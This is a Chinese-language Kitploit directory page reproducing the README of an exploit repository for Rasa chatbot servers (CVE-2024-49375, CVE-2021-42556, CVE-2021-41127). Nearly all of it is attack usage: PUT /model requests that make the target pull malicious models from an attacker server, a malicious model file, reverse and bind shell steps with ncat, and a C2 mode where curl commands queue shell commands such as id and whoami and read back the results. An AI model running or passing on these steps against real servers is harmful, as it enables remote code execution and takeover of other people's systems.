Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
工具/GitHubGitHub/lierbushiwo/rasa-cve-exp
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队远程访问工具Payload 开发
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

"# Rasa-cve-exp"

CVE-2021-42556

  • server-1.py

直接运行即可

root@kitploit:~
python server-1.py

image-20260604134536291

任意文件上传

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

效果如下:

image-20260604135232815

CVE-2021-41127

  • server-1.py

默认模型名evil_import_model.tar.gz

恶意模型demo

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet
下载工具

设定恶意对话规则

输入greet 返回PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

效果如下

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py修改压缩包内的指定数据

直接运行 默认读取/model目录模型 修改保存当当前目录evil_import_model.tar.gz

image-20260604143558105

指定反弹ip

默认模型名evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

依次发送数据即可

其他利用姿势exp

实际场景下有所不同

  • server-2.py

三种模式


C2 模式(HTTP 轮询,推荐)

root@kitploit:~
攻击机                     Rasa容器(target)
  │                            │
  ├─ 启动 server-2.py ─────────┤
  ├─ PUT /model ──→ 下载 pwnmod.py 到 /app/
  ├─ PUT /model ──→ 下载恶意模型 → import pwnmod → agent 启动
  │                            │
  │  ← GET /poll?agent=xxx ───┤  每 3s 轮询
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  拿到命令
  │  ← POST /result ──────────┤  回传结果
  ├─ /last?agent=xxx ──→ 读结果
root@kitploit:~
# 攻击机启动
python server-2.py --mode c2 --c2-base-url http://<攻击机IP>:8000 --port 8000

# 触发 exploit(两步)
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 下发命令
curl "http://<攻击机IP>:8000/enqueue?cmd=id"

# 等 8 秒后读结果(agent 每 3s 轮询 + 执行时间)
curl "http://<攻击机IP>:8000/last?agent=<hostname>"

# 不指定 agent 也行(走通配符)
curl "http://<攻击机IP>:8000/enqueue?cmd=whoami"
curl "http://<攻击机IP>:8000/last"

Reverse 模式(反向 Shell)

root@kitploit:~
# 1) 攻击机启动监听
ncat -lvnp 4444

# 2) 攻击机启动 server-2.py
python server-2.py --mode reverse --reverse-host <攻击机IP> --reverse-port 4444 --port 8000

# 3) 触发 exploit
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 4) nc 收到 $ 提示符,直接交互

Bind 模式(正向 Shell,不常用)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent 在目标容器内监听 0.0.0.0:4444
# ncat <目标IP> 4444 即可连接

端口/地址说明

参数含义
--port 8000server-2.py 自身的监听端口
--c2-base-urlC2 模式下 agent 轮询的完整 base URL(必须是容器能访问到的地址)
--reverse-host反弹 Shell 的目标 IP
--reverse-port反弹 Shell 的目标端口